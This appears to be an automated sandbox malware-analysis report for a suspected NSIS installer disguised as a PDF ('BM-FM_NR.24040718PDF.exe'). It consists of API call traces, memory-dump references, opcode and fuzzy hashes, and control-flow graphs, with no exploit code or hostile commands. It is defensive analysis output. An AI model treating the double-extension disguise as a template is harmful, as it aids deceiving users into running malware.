                                                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                      • GetTickCount.KERNEL32 ref: 00402C33
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                      • Instruction ID: 1b84634240e2166e3851fbc92cd381e461e1db94d3428fd6ef6110bf0b183a31
                                                                      • Opcode Fuzzy Hash: 42481ae060c013658952b0ba65f2133d3ed78682e8b262a627202bc2b689c50f
                                                                      • Instruction Fuzzy Hash: 97F05E30A09220EFD6317B20FE4CD9F7BA4BB04B15B404976F104B11EAC7782882CB9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Dominique Setup,NSIS Error), ref: 00405D3C
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                        • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                      • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                      • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,76293410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,76293410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 3248276644-3355392842
                                                                      • Opcode ID: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                      • Instruction ID: 9b9a112432e638448ae222c580828ae1e9a3246b43ea9c19d715dfb55d3aa95b
                                                                      • Opcode Fuzzy Hash: db8bdf16e861f9482455b6e3180b19c0ec0d0437e7b2793ecf43ff70ccde9147
                                                                      • Instruction Fuzzy Hash: 1CF0F427105D6156E622323A5C49A9F1A54CE86324718C53BFC50B22C2CA3C88639D7E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                        • Part of subcall function 00403F60: SendMessageA.USER32(000103D4,00000000,00000000,00000000), ref: 00403F72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                      • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                      • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                      • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                      • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                      Strings
                                                                      • Error launching installer, xrefs: 004054D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateHandleProcess
                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                      • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                      • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                      • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,76293410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                      • GlobalFree.KERNEL32(0063C8B0), ref: 0040363B
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-3355392842
                                                                      • Opcode ID: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                      • Instruction ID: 1a9bfca33d817e772708c534a1c0ef1eeb9da564593c1c7aee7843147688a1a4
                                                                      • Opcode Fuzzy Hash: dccbf9c36de3459267eb1af99735bed06c7a158201479be104942c1c24015bd8
                                                                      • Instruction Fuzzy Hash: 60E08C329050606BC6316F15ED04B2E76A9AB48B22F42006AEA407B3A08B756C424BCC
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004057EE
                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004057FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-3370423016
                                                                      • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction ID: 563d0c8124584ba78a4db43b9ec919a88ee2b9567cf051c7da1bb821b6b33a35
                                                                      • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                                      • Instruction Fuzzy Hash: 48D0A773808D705FF34362109C04B8F6B48CF12740F094062E140A71D0C2780C414BBD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                      • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                      • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:0%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:100%
                                                                      Total number of Nodes:1
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 73915 36b22b90 LdrInitializeThunk

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2 36b234e0-36b234ec LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 50e902f38627c8bc5856e5356ae849d05261f225fcd27db9fcc44422b9a3cf80
                                                                      • Instruction ID: 055e29319d0086650beb119950f9ecd6a69a3aa803744433b1e2497da5a17ab1
                                                                      • Opcode Fuzzy Hash: 50e902f38627c8bc5856e5356ae849d05261f225fcd27db9fcc44422b9a3cf80
                                                                      • Instruction Fuzzy Hash: DB90023170610402D50061584624706200547D0201F71C816A1414528DD7A5895579A3
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1 36b22d10-36b22d1c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
                                                                      • Instruction ID: 8863a6458c9e0d21ed14b21645b50799aa108ab08e4e8f8b9635749dcca94e38
                                                                      • Opcode Fuzzy Hash: 156152a113f26de045835593263fc8a0f390004c611cccad376ac1a76c52a9d3
                                                                      • Instruction Fuzzy Hash: DE90023130200413D51161584614707100947D0241FA1C817A1414518DE6668956B522
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 36b22b90-36b22b9c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
                                                                      • Instruction ID: 23a5ce3c4dc7bdecbe16454c99b084cde61476fd32786499411139387f8bc1b8
                                                                      • Opcode Fuzzy Hash: 5714444c545c18ecc087abdc915546641166b6422022205f30f955e87b1e7311
                                                                      • Instruction Fuzzy Hash: AE90023130208802D5106158851474A100547D0301F65C816A5414618DD6A588957522
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                      • API String ID: 0-2160512332
                                                                      • Opcode ID: be4e2f4077e692ef601f8a188c49ac78f8dd1b775c156f1bf298318d177ee52e
                                                                      • Instruction ID: 894655007141d0f19bb4057a211035a46434cc1f6fe00bd2c3f02b88c76a039c
                                                                      • Opcode Fuzzy Hash: be4e2f4077e692ef601f8a188c49ac78f8dd1b775c156f1bf298318d177ee52e
                                                                      • Instruction Fuzzy Hash: EF925AB5A14351AFE721CE22C880F5AB7E8FB84758F10492DFA94D7290D778D844CF9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 461 36b89060-36b890a9 462 36b890f8-36b89107 461->462 463 36b890ab-36b890b0 461->463 464 36b89109-36b8910e 462->464 465 36b890b4-36b890ba 462->465 463->465 466 36b89893-36b898a7 call 36b24b50 464->466 467 36b890c0-36b890e4 call 36b28f40 465->467 468 36b89215-36b8923d call 36b28f40 465->468 475 36b89113-36b891b4 GetPEB call 36b8d7e5 467->475 476 36b890e6-36b890f3 call 36ba92ab 467->476 477 36b8925c-36b89292 468->477 478 36b8923f-36b8925a call 36b898aa 468->478 488 36b891d2-36b891e7 475->488 489 36b891b6-36b891c4 475->489 487 36b891fd-36b89210 RtlDebugPrintTimes 476->487 482 36b89294-36b89296 477->482 478->482 482->466 486 36b8929c-36b892b1 RtlDebugPrintTimes 482->486 486->466 496 36b892b7-36b892be 486->496 487->466 488->487 491 36b891e9-36b891ee 488->491 489->488 490 36b891c6-36b891cb 489->490 490->488 494 36b891f0 491->494 495 36b891f3-36b891f6 491->495 494->495 495->487 496->466 497 36b892c4-36b892df 496->497 498 36b892e3-36b892f4 call 36b8a388 497->498 501 36b892fa-36b892fc 498->501 502 36b89891 498->502 501->466 503 36b89302-36b89309 501->503 502->466 504 36b8947c-36b89482 503->504 505 36b8930f-36b89314 503->505 508 36b89488-36b894b7 call 36b28f40 504->508 509 36b8961c-36b89622 504->509 506 36b8933c 505->506 507 36b89316-36b8931c 505->507 514 36b89340-36b89391 call 36b28f40 RtlDebugPrintTimes 506->514 507->506 513 36b8931e-36b89332 507->513 522 36b894b9-36b894c4 508->522 523 36b894f0-36b89505 508->523 511 36b89674-36b89679 509->511 512 36b89624-36b8962d 509->512 517 36b89728-36b89731 511->517 518 36b8967f-36b89687 511->518 512->498 516 36b89633-36b8966f call 36b28f40 512->516 519 36b89338-36b8933a 513->519 520 36b89334-36b89336 513->520 514->466 547 36b89397-36b8939b 514->547 540 36b89869 516->540 517->498 524 36b89737-36b8973a 517->524 526 36b89689-36b8968d 518->526 527 36b89693-36b896bd call 36b88093 518->527 519->514 520->514 529 36b894cf-36b894ee 522->529 530 36b894c6-36b894cd 522->530 534 36b89511-36b89518 523->534 535 36b89507-36b89509 523->535 531 36b897fd-36b89834 call 36b28f40 524->531 532 36b89740-36b8978a 524->532 526->517 526->527 553 36b89888-36b8988c 527->553 554 36b896c3-36b8971e call 36b28f40 RtlDebugPrintTimes 527->554 539 36b89559-36b89576 RtlDebugPrintTimes 529->539 530->529 565 36b8983b-36b89842 531->565 566 36b89836 531->566 537 36b8978c 532->537 538 36b89791-36b8979e 532->538 543 36b8953d-36b8953f 534->543 541 36b8950b-36b8950d 535->541 542 36b8950f 535->542 537->538 550 36b897aa-36b897ad 538->550 551 36b897a0-36b897a3 538->551 539->466 570 36b8957c-36b8959f call 36b28f40 539->570 552 36b8986d 540->552 541->534 542->534 548 36b8951a-36b89524 543->548 549 36b89541-36b89557 543->549 556 36b893eb-36b89400 547->556 557 36b8939d-36b893a5 547->557 562 36b8952d 548->562 563 36b89526 548->563 549->539 560 36b897b9-36b897fb 550->560 561 36b897af-36b897b2 550->561 551->550 559 36b89871-36b89886 RtlDebugPrintTimes 552->559 553->498 554->466 590 36b89724 554->590 569 36b89406-36b89414 556->569 567 36b893d2-36b893e9 557->567 568 36b893a7-36b893d0 call 36b88093 557->568 559->466 559->553 560->559 561->560 573 36b8952f-36b89531 562->573 563->549 571 36b89528-36b8952b 563->571 574 36b8984d 565->574 575 36b89844-36b8984b 565->575 566->565 567->569 578 36b89418-36b8946f call 36b28f40 RtlDebugPrintTimes 568->578 569->578 593 36b895bd-36b895d8 570->593 594 36b895a1-36b895bb 570->594 571->573 581 36b8953b 573->581 582 36b89533-36b89535 573->582 576 36b89851-36b89857 574->576 575->576 584 36b89859-36b8985c 576->584 585 36b8985e-36b89864 576->585 578->466 597 36b89475-36b89477 578->597 581->543 582->581 583 36b89537-36b89539 582->583 583->543 584->540 585->552 591 36b89866 585->591 590->517 591->540 595 36b895dd-36b8960b RtlDebugPrintTimes 593->595 594->595 595->466 599 36b89611-36b89617 595->599 597->553 599->524
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.13649553951.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_36ab0000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: DebugPrintTimes
                                                                      • String ID: $ $0
                                                                      • API String ID: 3446177414-3352262554
